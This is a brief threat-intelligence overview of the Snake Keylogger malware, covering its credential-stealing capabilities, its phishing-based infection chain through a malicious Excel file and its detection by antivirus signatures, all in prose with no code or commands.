Snake Keylogger

Snake Keylogger, also known as "404 Keylogger" or "KrakenKeylogger," is a subscription-based keylogger malware with extensive capabilities. It is designed to covertly monitor and record every keystroke on a computer, including usernames and passwords, and scan applications to steal saved credentials. This data is then exfiltrated using various protocols and delivered back to the hackers, who may use it directly or sell it on the dark web. Snake Keylogger was a persistent threat throughout 2021 and 2022, and its risk remained significant in 2023. The deployment of Snake Keylogger often begins with a phishing email containing a malicious Excel document. The recipient is lured into opening the file under the guise of viewing details of a "balance payment." Once opened, the document exploits a known vulnerability to download an HTA file, which subsequently uses multiple language scripts, such as JavaScript, VBScript, and PowerShell, to download the Snake Keylogger's Loader module. The Snake Keylogger Deploy module then establishes persistence on the victim's computer and conducts process hollowing to run the core module in a newly created process. The Snake Keylogger's functioning involves stealing sensitive information from the victim's computer and transmitting this stolen data to the attacker using the SMTP protocol. FortiGuard Antivirus service can detect the attached Excel document, the downloaded executable file, and the extracted Snake Keylogger with specific AV signatures. Despite similarities in capabilities with other malware families like Agent Tesla, Snake Keylogger remains one of the top malware threats identified by Cofense.